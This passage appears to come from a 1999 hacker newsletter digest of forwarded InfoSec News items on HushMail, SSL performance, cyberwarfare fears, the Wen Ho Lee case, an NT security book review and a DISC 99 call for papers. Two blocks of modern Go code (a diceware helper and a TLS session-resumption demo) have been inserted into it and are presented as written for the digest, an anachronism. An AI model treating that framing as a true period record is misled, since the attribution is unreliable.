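	n, err := rand.Int(rand.Reader, big.NewInt(6))
	if err != nil {
		panic(err) // the kernel RNG is unavailable; nothing sensible to do
	}
	return int(n.Int64()) + 1
}

// DiceToIndex turns five throws into a 0-based index into the word list:
// 1-1-1-1-1 -> 0 and 6-6-6-6-6 -> 7775. Anything else is rejected.
func DiceToIndex(rolls []int) (int, error) {
	if len(rolls) != rollsPerWord {
		return 0, fmt.Errorf("need %d rolls, got %d", rollsPerWord, len(rolls))
	}
	idx := 0
	for _, r := range rolls {
		if r < 1 || r > 6 {
			return 0, fmt.Errorf("roll %d is outside 1..6", r)
		}
		idx = idx*6 + (r - 1)
	}
	return idx, nil
}

// EntropyBits is the strength of an n-word passphrase drawn uniformly
// from a list of listSize words: n * log2(listSize).
func EntropyBits(n, listSize int) float64 {
	return float64(n) * math.Log2(float64(listSize))
}

// WordsNeeded is the smallest word count whose entropy reaches targetBits.
func WordsNeeded(targetBits float64, listSize int) int {
	return int(math.Ceil(targetBits / math.Log2(float64(listSize))))
}

// DiceKeys generates the lookup keys for an n-word passphrase, one
// five-digit string per word (e.g. "42516"), which is exactly what a user
// looks up in the printed list. Keys are space-separated.
func DiceKeys(n int) string {
	keys := make([]string, n)
	for i := range keys {
		var sb strings.Builder
		for j := 0; j < rollsPerWord; j++ {
			sb.WriteByte(byte('0' + rollDie()))
		}
		keys[i] = sb.String()
	}
	return strings.Join(keys, " ")
}

func main() {
	fmt.Printf("six words from the full list: %.1f bits\n", EntropyBits(6, diceWords))
	fmt.Printf("words needed for 80 bits: %d\n", WordsNeeded(80, diceWords))
	fmt.Println("lookup keys:", DiceKeys(6))
}
```

Each word from a 7776-entry list contributes about 12.9 bits, so six words give roughly 77.5 bits and seven are needed to clear 80; the point of generating the keys rather than asking the user to "think of" a phrase is that the strength then depends only on the dice, not on the guidance the enrollment screen happens to offer.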
I spoke with Cliff Baltzley, Hush's CEO and chief technical wizard. He stresses that Hush's desire and intention is to move toward interoperability with other players in the crypto world, such as PGP and S/MIME. The obstacles to doing so are the constraints on technical resources (read: offshore crypto programmers) and legal questions of intellectual property. Baltzley believes that HushMail's positive impact on privacy worldwide will be enhanced by maximizing the product's openness.

[1] https://www.hushmail.com/
[2] https://www.hushmail.com/faq.htm
[3] https://www.hushmail.com/tech_description.htm
[4] http://world.std.com/~reinhold/diceware.html

@HWA

32.0 [ISN] E-Biz Bucks Lost Under SSL Strain
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Sat, 22 May 1999 06:17:04 -0600 (MDT)
From: cult hero
To: InfoSec News
Subject: [ISN] E-Biz Bucks Lost Under SSL Strain

http://www.internetwk.com/lead/lead052099.htm

Thursday, May 20, 1999

E-Biz Bucks Lost Under SSL Strain
By TIM WILSON

A customer stuffs his shopping cart with goodies from your Web site. Credit card in hand, he waits for a secure connection to consummate the deal. And waits. Finally, short of patience, he dumps the contents and logs off.

It may sound like an e-commerce manager's nightmare, but according to the latest Web server performance statistics, it's an increasingly common phenomenon. The ghost in the machine is Secure Sockets Layer, the commonly used method of securing communications between users and Web sites.

Recent tests conducted by researcher Networkshop Inc. indicate that powerful Web servers capable of handling hundreds of transactions per second may be brought to a near standstill by heavy SSL traffic.
Some server configurations suffered as much as a fiftyfold degradation in performance from SSL, down to just a few transactions per second, according to analyst Alistair Croll at Networkshop.

The growing problem of SSL performance has driven vendors to develop devices that can help share the Web server's processing load. IPivot Inc. next month will ship two new processors that can offload authentication and encryption on e-commerce sites.

IT managers and other experts have known for years that SSL, which requires the authentication and encryption of Web server connections, can significantly slow site performance. But the problem is rapidly becoming more chronic as companies increase secured Web transactions, they said.

"Our business is very seasonal, and a lot of it is concentrated in the fourth quarter. This past December, we found ourselves shuffling servers around to handle the load," said Stephen McCollum, network architect at Hewitt Associates. The $858 million company manages benefits plans for large organizations, and because Hewitt's Web traffic is personal and confidential, virtually all of it is conducted via SSL.

Hewitt is far from alone in its reliance on SSL. According to a study conducted by research company Netcraft Ltd., SSL implementations doubled from 15,000 sites to more than 35,000 sites between 1998 and 1999. And many of those server sites are struggling under the load.

"I'd guess that somewhere between 10 and 25 percent of [e-commerce] transactions are aborted because of slow response times," said Rodney Loges, vice president of business development at Digital Nation, a Web hosting company. That translates to as much as $1.9 billion in lost revenue, using Forrester Research numbers for 1998 of $7.8 billion in e-retail sales.

According to Networkshop, even the most powerful, general-purpose Web server hardware can be dragged down by large volumes of SSL traffic.
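The expensive part of the load the article describes is the full handshake (certificate exchange and public-key operations), not the bulk encryption that follows. Besides the co-processor cards and offload boxes the article covers, the protocol itself offers a mitigation: session resumption, where a returning client presents a ticket and skips the public-key work. The program below is an added example written for this digest, not code from Networkshop, IPivot or any vendor named here; it builds a throwaway certificate for the hypothetical host "demo.invalid", runs a full handshake and then a resumed one over an in-memory pipe, and reports whether each was resumed and how long the client waited.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/tls"
	"crypto/x509"
	"crypto/x509/pkix"
	"fmt"
	"math/big"
	"net"
	"time"
)

// selfSignedCert builds a throwaway ECDSA server certificate in memory for
// the hypothetical host "demo.invalid", so the demo needs no files.
func selfSignedCert() (tls.Certificate, *x509.CertPool, error) {
	key, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		return tls.Certificate{}, nil, err
	}
	tmpl := &x509.Certificate{
		SerialNumber: big.NewInt(1),
		Subject:      pkix.Name{CommonName: "demo.invalid"},
		DNSNames:     []string{"demo.invalid"},
		NotBefore:    time.Now().Add(-time.Hour),
		NotAfter:     time.Now().Add(time.Hour),
		KeyUsage:     x509.KeyUsageDigitalSignature,
		ExtKeyUsage:  []x509.ExtKeyUsage{x509.ExtKeyUsageServerAuth},
	}
	der, err := x509.CreateCertificate(rand.Reader, tmpl, tmpl, &key.PublicKey, key)
	if err != nil {
		return tls.Certificate{}, nil, err
	}
	leaf, err := x509.ParseCertificate(der)
	if err != nil {
		return tls.Certificate{}, nil, err
	}
	pool := x509.NewCertPool()
	pool.AddCert(leaf)
	return tls.Certificate{Certificate: [][]byte{der}, PrivateKey: key, Leaf: leaf}, pool, nil
}

// handshake runs one client/server TLS handshake over an in-memory pipe and
// reports whether the session was resumed and how long the client waited.
func handshake(srvCfg, cliCfg *tls.Config) (resumed bool, elapsed time.Duration, err error) {
	c, s := net.Pipe()
	defer c.Close()
	defer s.Close()

	errc := make(chan error, 1)
	go func() {
		e := tls.Server(s, srvCfg).Handshake()
		if e != nil {
			s.Close() // unblock the client if the server side failed
		}
		errc <- e
	}()

	start := time.Now()
	cc := tls.Client(c, cliCfg)
	if err = cc.Handshake(); err != nil {
		return false, 0, err
	}
	elapsed = time.Since(start)
	if err = <-errc; err != nil {
		return false, 0, err
	}
	return cc.ConnectionState().DidResume, elapsed, nil
}

// Result records the two handshakes performed by ResumptionDemo.
type Result struct {
	FirstResumed, SecondResumed bool
	FirstTime, SecondTime       time.Duration
}

// ResumptionDemo performs a full handshake and then a second one from the
// same client session cache; the second resumes from the ticket issued by
// the first, skipping certificate verification and the key exchange.
func ResumptionDemo() (Result, error) {
	cert, pool, err := selfSignedCert()
	if err != nil {
		return Result{}, err
	}
	srvCfg := &tls.Config{
		Certificates: []tls.Certificate{cert},
		// TLS 1.2 delivers the session ticket inside the handshake itself;
		// TLS 1.3 sends it afterwards and the client must Read to receive it.
		MaxVersion: tls.VersionTLS12,
	}
	cliCfg := &tls.Config{
		RootCAs:            pool,
		ServerName:         "demo.invalid",
		ClientSessionCache: tls.NewLRUClientSessionCache(8),
		MaxVersion:         tls.VersionTLS12,
	}
	var r Result
	if r.FirstResumed, r.FirstTime, err = handshake(srvCfg, cliCfg); err != nil {
		return Result{}, err
	}
	if r.SecondResumed, r.SecondTime, err = handshake(srvCfg, cliCfg); err != nil {
		return Result{}, err
	}
	return r, nil
}

func main() {
	r, err := ResumptionDemo()
	if err != nil {
		panic(err)
	}
	fmt.Printf("full handshake:    resumed=%v %v\n", r.FirstResumed, r.FirstTime)
	fmt.Printf("resumed handshake: resumed=%v %v\n", r.SecondResumed, r.SecondTime)
}
```

The first handshake reports resumed=false and the second resumed=true. The timings printed are for one in-process pair and are not comparable to the article's connections-per-second figures; the point is that a returning client costs the server no public-key operation at all, which is why a short session-cache lifetime on a busy site turns up as exactly the kind of load the article measures.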
In its most recent tests, the research company found that a typical Pentium server configuration running Linux and Apache, which at full capacity can handle about 322 connections per second of standard HTTP traffic, fell to about 24 connections per second when handling a full load of SSL traffic.

A similar test conducted on a Sun 450 server running Solaris and Apache experienced even more trouble. The server handled about 500 connections per second of HTTP traffic at full capacity, but only about 3 connections per second when the traffic was secured via SSL. Networkshop tests of quad-processor configurations showed that those performance ratios scale to multiserver environments as well, Croll said.

A few vendors, such as Rainbow Technologies Inc., have solved the problem by offloading security processing onto a dedicated co-processor card that slips into a server. But as SSL traffic increases, adding and managing co-processor boards becomes unwieldy, IT managers said.

"We found that the [co-processor] cards were kind of a kludge, because they have to be added to every server," said Digital Nation's Loges.

IPivot will begin shipping two external SSL processors--the Commerce Accelerator 1000 and the Commerce Director 8000, which includes IPivot's load-balancing system--to help eliminate SSL bottlenecks. The Commerce Accelerator 1000 is priced at $9,995; the Commerce Director 8000 costs $39,950.

@HWA

33.0 [ISN] Bracing for guerrilla warfare in cyberspace
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Sat, 22 May 1999 06:22:31 -0600 (MDT)
From: cult hero
To: InfoSec News
Subject: [ISN] Bracing for guerrilla warfare in cyberspace

[Moderator: Warning - A fair share of FUD in this article.]
Forwarded From: Sunit Nangia

http://www.cnn.com/TECH/specials/hackers/cyberterror/

Bracing for guerrilla warfare in cyberspace
'There are lots of opportunities; that's very scary'

April 6, 1999
By John Christensen
CNN Interactive

(CNN) -- It is June, the children are out of school, and as highways and airports fill with vacationers, rolling power outages hit sections of Los Angeles, Chicago, Washington and New York. An airliner is mysteriously knocked off the flight control system and crashes in Kansas. Parts of the 911 service in Washington fail, supervisors at the Department of Defense discover that their e-mail and telephone services are disrupted and officers aboard a U.S. Navy cruiser find that their computer systems have been attacked.

As incidents mount, the stock market drops precipitously, and panic surges through the population.

Unlikely? Hardly. The "electronic Pearl Harbor" that White House terrorism czar Richard A. Clarke fears is not just a threat, it has already happened.

Much of the scenario above -- except for the plane and stock market crashes and the panic -- occurred in 1997 when 35 hackers hired by the National Security Agency launched simulated attacks on the U.S. electronic infrastructure. "Eligible Receiver," as the exercise was called, achieved "root level" access in 36 of the Department of Defense's 40,000 networks. The simulated attack also "turned off" sections of the U.S. power grid, "shut down" parts of the 911 network in Washington, D.C., and other cities and gained access to systems aboard a Navy cruiser at sea.

At a hearing in November 1997, Sen. Jon Kyl, R-Arizona, chairman of a Senate technology subcommittee, reported that nearly two-thirds of U.S. government computer systems have security holes.

"If somebody wanted to launch an attack," says Fred B. Schneider, a professor of computer science at Cornell University, "it would not be at all difficult."
'There are lots of opportunities'

Although "Eligible Receiver" took place in the United States, which has about 40 percent of the world's computers, the threat of cyberterrorism is global. Consider:

* During the Gulf War, Dutch hackers stole information about U.S. troop movements from U.S. Defense Department computers and tried to sell it to the Iraqis, who thought it was a hoax and turned it down.

* In March 1997, a 15-year-old Croatian youth penetrated computers at a U.S. Air Force base in Guam.

* In 1997 and 1998, an Israeli youth calling himself "The Analyzer" allegedly hacked into Pentagon computers with help from California teen-agers. Ehud Tenebaum, 20, was charged in Jerusalem in February 1999 with conspiracy and harming computer systems.

* In February 1999, unidentified hackers seized control of a British military communication satellite and demanded money in return for control of the satellite. The report was vehemently denied by the British military, which said all satellites were "where they should be and doing what they should be doing." Other knowledgeable sources, including the Hacker News Network, called the hijacking highly unlikely.

"There are lots of opportunities," says Schneider. "That's very scary."

'The Holy Grail of hackers'

President Clinton announced in January 1999 a $1.46 billion initiative to deal with U.S. government computer security -- a 40 percent increase over fiscal 1998 spending.

Of particular concern is the Pentagon, the military stronghold of the world's most powerful nation.

"It's the Holy Grail of hackers," says computer security expert Rob Clyde. "It's about bragging rights for individuals and people with weird agendas." Clyde is vice president and general manager of technical security for Axent Technologies, a company headquartered in Rockville, Maryland, that counts the Pentagon as one of its customers.
The Defense Department acknowledges between 60 and 80 attacks a day, although there have been reports of far more than that. The government says no top secret material has ever been accessed by these intruders, and that its most important information is not online. But the frustration is evident. Michael Vatis, director of the FBI's National Infrastructure Protection Committee, told a Senate subcommittee last year that tracing cyberattacks is like "tracking vapor."

'A lot of clueless people'

Schneider says the "inherently vulnerable" nature of the electronic infrastructure makes counterterrorism measures even more difficult. Schneider chaired a two-year study by the National Academy of Sciences and the National Academy of Engineering that found that the infrastructure is badly conceived and poorly secured.

"There is a saying that the amount of 'clue' [knowledge] on the Internet is constant, but the size of the Internet is growing exponentially," says Schneider. "In other words, there are a lot of clueless people out there. It's basically a situation where people don't know how to lock the door before walking out, so more and more machines are vulnerable."

Schneider says the telephone system is far more complicated than it used to be, with "a lot of nodes that are programmable, and databases that can be hacked." Also, deregulation of the telephone and power industries has created another weakness: To stay competitive and cut costs, companies have reduced spare capacity, leaving them more vulnerable to outages and disruptions in service.

Still another flaw is the domination of the telecommunications system by phone companies and Internet service providers (ISPs) that don't trust each other. As a result, the systems do not mesh seamlessly and are vulnerable to failures and disruptions.

"There's no way to organize systems built on mutual suspicion," Schneider says. "We're subtly changing the underpinnings of the system, but we're not changing the way they're built.
We'll keep creating cracks until we understand that we need a different set of principles for the components to deal with each other."

'The democratization of hacking'

Meanwhile, the tools of mayhem are readily available. There are about 30,000 hacker-oriented sites on the Internet, bringing hacking -- and terrorism -- within the reach of even the technically challenged.

"You no longer have to have knowledge, you just have to have the time," Clyde says. "You just download the tools and the programs. It's the democratization of hacking. And with these programs ... they can click on a button and send bombs to your network, and the systems will go down."

Schneider says another threat is posed not by countries or terrorists, but by gophers and squirrels and farmers. In 1995, a New Jersey farmer yanked up a cable with his backhoe, knocking out 60 percent of the regional and long distance phone service in New York City and air traffic control functions in Boston, New York and Washington. In 1996, a rodent chewed through a cable in Palo Alto, California, and knocked Silicon Valley off the Internet for hours.

"Although the press plays up the security aspect of hacker problems," says Schneider, "the other aspect is that the systems are just not built very reliably. It's easy for operators to make errors, and a gopher chewing on a wire can take out a large piece of the infrastructure. That's responsible for most outages today."

'The prudent approach'

Schneider and Clyde favor a team of specialists similar to Clinton's proposed "Cyber Corps" program, which would train federal workers to handle and prevent computer crises. But they say many problems can be eliminated with simple measures. These include "patches" for programs, using automated tools to check for security gaps and installing monitoring systems and firewalls. Fixes are often free and available on the Internet, but many network administrators don't install them.
A step toward deterrence was taken in 1998 when CIA Director George Tenet announced that the United States was devising a computer program that could attack the infrastructure of other countries.

"That's nothing new," says Clyde, "but it's the first time it was publicly announced. If a country tries to destroy our infrastructure, we want to be able to do it back. It's the same approach we've taken with nuclear weapons, the prudent approach."

The U.S. Government Accounting Office estimates that 120 countries or groups have or are developing information warfare systems. Clyde says China, France and Israel already have them, and that some Pentagon intrusions have surely come from abroad. "We don't read about the actual attacks," says Clyde, "and you wouldn't expect to."

"The Analyzer" was caught after he bragged about his feat in computer chat rooms, but Clyde says the ones to worry about are those who don't brag and don't leave any evidence behind.

"Those are the scary ones," he says. "They don't destroy things for the fun of it, and they're as invisible as possible."

@HWA

34.0 [ISN] Prosecuting Lee Is Problematic
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Wed, 26 May 1999 00:05:43 -0600 (MDT)
From: cult hero
To: InfoSec News
Subject: [ISN] Prosecuting Lee Is Problematic

http://www.washingtonpost.com/wp-srv/WPlate/1999-05/24/080l-052499-idx.html

Prosecuting Lee Is Problematic
Physicist's Mishandling of Computer Data May Not Be Crime

By Vernon Loeb and Walter Pincus
Washington Post Staff Writers
Monday, May 24, 1999; Page A05

Espionage suspect Wen Ho Lee's transfer of top secret computer programs from a classified to a vulnerable computer network at Los Alamos National Laboratory has left federal prosecutors wrestling with the question of whether such mishandling of classified information in cyberspace constitutes a crime.
Lacking evidence of espionage, FBI agents have focused on Lee's unauthorized data transfer ever since they searched his desktop computer in March and discovered top secret "legacy codes" in a system that could have been accessed by hackers.

But there is no known prosecution of anyone for transferring classified data from classified to unclassified government computer systems, leaving prosecutors to fathom the frontiers of cybersecurity under espionage statutes that make no reference to computers, according to lawyers specializing in national security law and U.S. officials familiar with the case.

Lee, 59, a Taiwan-born nuclear physicist who is a U.S. citizen, was fired March 8 for alleged security violations at Los Alamos and identified by U.S. officials as an espionage suspect, despite their inability to charge him as a spy for China. Congress is investigating why the FBI and the Justice Department failed to search his office computer prior to his dismissal.

That slow response drew more criticism yesterday. The chairman of the Senate intelligence committee, Richard C. Shelby (R-Ala.), renewed his call for the ouster of Attorney General Janet Reno. Branding her handling of the case "indefensible," Shelby said on CBS's "Face the Nation" that "the attorney general ought to resign and she ought to take her top lieutenants with her."

On the same show, Sen. Robert G. Torricelli (D-N.J.) also criticized Reno, although he stopped short of advocating resignation: "It's time for President Clinton to have a conversation with the attorney general about her ability to perform her duties and whether or not it is in the national interest for her to continue."

Torricelli said Reno had displayed "failures of judgment" that were "inexplicable." He singled out her decision not to approve a wire tap of Lee "despite overwhelming evidence that there was probable cause and that the national security was being compromised."
White House spokesman Barry Toiv said Clinton "has full confidence in Attorney General Reno," Reuters reported.

Lee has denied passing classified information to China and has said through his attorney he took "substantial steps" to safeguard the transferred computer codes.

A provision of the federal espionage statute makes the removal of classified defense information from its "proper place of custody" through "gross negligence" a felony punishable by up to 10 years in prison, according to lawyers specializing in national security cases. But it is unclear whether Lee could be charged under that provision, absent intent on his part to make unlawful use of the data or evidence it was obtained by unauthorized individuals, they said.

"You've got a clear security breach," said former CIA inspector general Frederick Hitz. "But as far as a criminal prosecution . . . I would think that's going to be tough."

Another law makes the "unauthorized removal and retention of classified documents or material" at one's home a misdemeanor punishable by a maximum $1,000 fine and one-year prison sentence. The measure was enacted to safeguard classified materials against careless handling, not espionage. Two former National Security Agency employees, a husband and wife, were the first to be prosecuted under the law last year, pleading guilty to having retained classified documents at their home after leaving government service.

But the lawyers specializing in national security cases say they do not believe the statute could be used against Lee, because he apparently did not remove the programs from government property. They said in two recent cases involving computer transfers of classified information, one involving another Los Alamos scientist and the other, former CIA director John M. Deutch, the Justice Department declined prosecution.
The scientist at Los Alamos, who has not been publicly identified, moved classified nuclear weapons data last year from the laboratory's classified to its unclassified network in a transfer analogous to that performed by Lee. But the transfer was ultimately determined to have been "inadvertent," according to a senior Energy Department official. The FBI found no criminal intent and closed the case, the official said.

Deutch was investigated by the Justice Department for transferring more than 30 classified documents to his personal, unsecured laptop during his tenure as CIA director from May 1995 to December 1996. The security breach was discovered when CIA specialists went to his Washington home to remove a classified computer and safe and discovered the classified files on his personal computer.

Under CIA policy, Deutch's security violation was forwarded to Justice for review, but officials there declined prosecution. The case was recently returned to the CIA for review by Inspector General Britt Snider, who is expected to complete a report on the matter soon. Deutch, who does government consulting and teaches at Massachusetts Institute of Technology, could have his security clearance lifted for a period of time, one government source said.

-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: OSAll [www.aviary-mag.com]

@HWA

35.0 [ISN] Slip of the Tongue Lightens up Encryption Hearing
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Wed, 26 May 1999 00:01:24 -0600 (MDT)
From: cult hero
To: InfoSec News
Subject: [ISN] Slip of the Tongue Lightens up Encryption Hearing

http://www.nytimes.com/library/tech/99/05/cyber/articles/25capital.html

May 25, 1999

Slip of the Tongue Lightens up Encryption Hearing
By JERI CLAUSING

WASHINGTON -- The Clinton Administration's point man on encryption policy silenced his Congressional critics -- momentarily, anyway -- with a slip of the tongue at a House hearing last week.
"Never underestimate the stupidity of some of the people we have to deal with," William A. Reinsch, Under Secretary of Commerce for the Bureau of Export Administration, said while being grilled about whether terrorists and criminals would be naïve enough to use the technology being pushed by the Administration.

The House International Relations subcommittee meeting fell silent and Reinsch turned bright red as he realized the double meaning of what he had said. As the silence turned to laughter, Reinsch tried to backtrack, blurting, "I didn't say that."

But it was enough to silence Representative Bradley J. Sherman. Sherman promptly ended his grilling of Reinsch, who along with representatives of the National Security Agency and the Federal Bureau of Investigation, was testifying in defense of the Administration's encryption policy.

The Administration has tied any loosening of export controls on strong encryption to the development of technology that would guarantee law enforcement easy access to criminals' communications.

@HWA

36.0 [ISN] REVIEW: "Microsoft Windows NT 4.0 Security, Audit, and Control"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Wed, 26 May 1999 00:03:24 -0600 (MDT)
From: cult hero
To: InfoSec News
Subject: [ISN] REVIEW: "Microsoft Windows NT 4.0 Security, Audit, and Control"

Forwarded From: "Rob Slade"

BKWNTSAC.RVW   990409

"Microsoft Windows NT 4.0 Security, Audit, and Control", James G. Jumes et al, 1999, 1-57231-818-X, U$49.99/C$71.99/UK#45.99
%A   James G. Jumes
%A   Neil F. Cooper
%A   Paula Chamoun
%A   Todd M. Feinman
%C   1 Microsoft Way, Redmond, WA 98052-6399
%D   1999
%G   1-57231-818-X
%I   Microsoft Press
%O   U$49.99/C$71.99/UK#45.99 800-6777377 fax: 206-936-7329
%P   318 p.
%S   Technical Reference
%T   "Microsoft Windows NT 4.0 Security, Audit, and Control"

The primary audience described in the introduction seems to be security professionals. However, system administrators, technology managers, and CIOs are mentioned as well. The attempt at breadth of coverage usually does not bode well in works like these.

Chapter one discusses an information security model based upon the business (and other) objectives of the institution in question. While valid as far as it goes, and even possibly helpful when formulating security policy, this by no means provides a structure from which to view either security policy or procedures, let alone implement a complex set of controls. The widget company, beloved of management writers, is described in chapter two. For the purposes of assessing security in real world working environments, this particular widget company seems to be astoundingly simple and homogeneous. Chapter three starts out talking reasonably about security policy, starts to get flaky in risk assessment (I would definitely worry about a .45 chance of an earthquake), and tails off into trivia.

Monitoring, in chapter four, looks first at system performance and diagnostics, and then gets into event logging without really going into the concepts. Many areas of physical security are left uncovered in chapter five. Chapter six discusses domains, trust relationships, and remote access permissions. Dialogue boxes for user accounts and groups are listed in chapter seven. There is some mention of the commonly "received wisdom" in regard to these topics, as there is in chapter eight regarding account policies, but nothing very significant.

File system, share, and other resource control is covered in chapter nine. Chapter ten is a bit of a grab bag without much focus. The registry is reviewed in chapter eleven. Chapter twelve looks briefly at power supplies and backups.
Although it talks about auditing, chapter thirteen is more of a checklist of security features to think about. Appendix A is a bit better in this regard: it lists recommended settings across a number of functions for six different types of systems.

There is some discussion of options as the various functions are addressed, so, in a sense, this is a start towards full coverage of NT security. It has a long way to go, though. In addition, the deliberation comes at the cost of a loss of some detail in terms of security implementation.

@HWA

37.0 [ISN] LCI Intros SMARTpen Biometric Signature Authentication
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Wed, 26 May 1999 01:22:36 -0600 (MDT)
From: cult hero
To: InfoSec News
Subject: [ISN] LCI Intros SMARTpen Biometric Signature Authentication

Forwarded From: 7Pillars Partners

LCI Intros SMARTpen Biometric Signature Authentication

'S-HERTOGENBOSCH, NETHERLANDS, 1999 MAY 24 (NB)
By Sylvia Dennis, Newsbytes.

LCI Technology has taken the wraps off its SMARTpen biometric signature authentication system. The SMARTpen is billed as the world's first wireless signature device and the only biometric unit of its type that writes on normal paper.

Sam Asseer, the firm's chairman, said that the unit was designed for high-end security transactions. It is, he explained, a wireless embedded computer system that looks and writes like a common ballpoint pen. In use, the SMARTpen uses built-in sensors that enable the authentication of users through the biometric characteristics of their signatures on regular paper.

"Electronic commerce is rapidly becoming the way the world does business," he said, adding that the surge in online transactions over the past two years and the predictions for explosive growth going into the year 2000 suggests that the future of e-commerce is unlimited.
"But, as the number of Internet transactions increases, there is an even greater demand for security to ensure confidentiality and prevent fraud. Biometric authentication systems like the LCI SMARTpen help create the secure environment necessary for the continued expansion of global e-commerce," he said.

According to the firm, the SMARTpen measures individual signature characteristics, encrypts the data and transmits it via radio frequency to a computer, where LCI software compares it to a template for verification - all in about three seconds.

The firm claims that the dynamics of signatures as measured by the SMARTpen are personal and not directly visible from the written image. This, the firm says, makes it virtually impossible for forged signatures to get through the SMARTpen system.

The system works with standard APIs (application programming interfaces) and the false rejection/false acceptance rate can be adjusted by system parameters, so adding flexibility.

Pricing on the SMARTpen is expected to range from $100 to $250, depending on the model and configuration of the product. According to LCI, the price includes the pen and software components. The SMARTpen also has integral sensors, a mouse, a digital signal processor, radio transmitter and receiver, and encryption system.

LCI's Web site is at http://www.smartpen.net .

@HWA

38.0 [ISN] CFP: DISC 99 Computer Security 99
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Thu, 27 May 1999 02:31:07 -0600 (MDT)
From: cult hero
To: InfoSec News
Subject: [ISN] CFP: DISC 99 Computer Security 99

Forwarded From: Juan Carlos Guel Lopez

.---' .---' .---' .---' .---' .---' .---' .---' .---' .---' .---' .---' .---'

          ____ ___ ____   ____   ___   ___
         |  _ \_ _/ ___| / ___| / _ \ / _ \
         | | | | |\___ \| |    | (_) | (_) |
         | |_| | | ___) | |___  \__, |\__, |
         |____/___|____/ \____|   /_/   /_/

          C o m p u t e r   S e c u r i t y   9 9

                   "Working Together"

                   October 4-8, 1999
          Palacio de Minería, México City, México.

.---' .---' .---' .---' .---' .---' .---' .---' .---' .---' .---' .---' .---'

          C A L L   F O R   P A R T I C I P A T I O N

The goal of Computer Security 99 (DISC 99) is to create awareness in the computer user community about security strategies and mechanisms used to protect information.

For the second consecutive year the DISC takes place alongside the most important computing event of Mexico, the computing general congress Computo.99@mx (http://www.computo99.unam.mx/), and invites specialists in computer security to participate.

"Working Together" is the slogan for this year's event, suggesting that security in the organization can only exist and be increased with the work of all the people in the organization, including users, management and security personnel.
The community is invited to participate in the DISC 99 event through the presentation of theoretical, technical, and applied works, and of practical experience, in the following topics (but not limited to them):

@ > Electronic commerce
    - Certification
    - Digital cash
    - New protocols
    - Secure transactions
@ > New Firewall technologies
@ > World Wide Web security
    - Secure Sockets Layer (SSL)
@ > Network security
@ > Security for software developers
@ > Security in distributed systems and data bases
@ > Security in agents and multi-platform languages
@ > Incident response teams
@ > Computer security incident handling, prevention and coordination
@ > Administrative and legal issues in the incident handling
@ > Software protection and intellectual property
@ > New tools for incident handling
@ > Attacks and intrusion detection
@ > Computer attacks
@ > Privacy and cryptography protocols
@ > Security policies

.......................
Who should attend ?
.......................

* System administrators who are interested in Computer Security.
* People working in the field of Computer Security, and handling Computer Security incidents.
* Anybody who is interested in Computer Security and wants to meet other interested people. This event will help him or her to improve security programs, security plans, and security tools by sharing and getting a wide experience and knowledge.
* People who want to establish incident response teams.
* Anybody who has a particular interest in network security, monitoring tools, intrusion detection and firewalls.
' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' '
Important Dates
' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' '

Paper submissions:       July 2
Acceptance notification: August 6
Final papers due:        August 20
Event Dates:             October 4-8

' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' '
Workshop Format
' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' '

There will be tutorial-style presentations during October 4 and 5. October 6, 7 and 8 will consist of conference papers and workshop-style presentations, as well as business sessions. Two evenings are allocated for participants to hold events devoted to subjects of particular interest ("birds of a feather" sessions).

Contributions should follow the following guidelines:

1. Tutorials: Half or full day tutorial proposals will be considered.

2. Papers: Written papers may be as long as desired, but presentations must be limited to 30 minutes.

3. Workshops: These informal sessions should either follow a more "hands-on" approach or provide for a high degree of audience participation. They should be tailored to address specific issues and should be from 60 to 90 minutes in duration. Panel Sessions on a particular topic are also acceptable.

' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' '
Instruction for authors
' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' '

We will receive proposals for presentations, workshops and tutorials that follow these guidelines:

* The documents should be delivered by the indicated date.
* The contents of the documents should be high-quality and original. It should also include an abstract that describes the content and style of the presentation.
* The papers will be evaluated using the proposal, which has to contain:
  - title
  - format (workshop, tutorials or conference)
  - extended abstract (more than one but less than two pages)
  - requirements for the presentation (computing equipment, data projector, slide projector, etc.)
  - author information
    - name
    - address and affiliation
    - brief resume
    - fax and telephone number
    - e-mail address
* For tutorials, the following information should also be included:
  - goal
  - introduction and summary
  - outline of the presentation
  - duration (half or full day)
  - presentation material (slides)

....................
Accepted formats
....................

Authors whose papers are accepted must submit the complete paper to be included in the Cómputo.99@mx proceedings. Submissions will be accepted in the following formats:

- TeX/LaTeX
- PostScript
- Word for Windows
- ASCII
- Please contact the committee (disc99@asc.unam.mx) if you need to use a different format.

Note: The specifications of the papers such as margins, font size and line spacing will be specified in the DISC 99 WWW page at: http://www.asc.unam.mx/disc99-i/convocatoria.html

' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' '
Program Committee
' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' '

President:
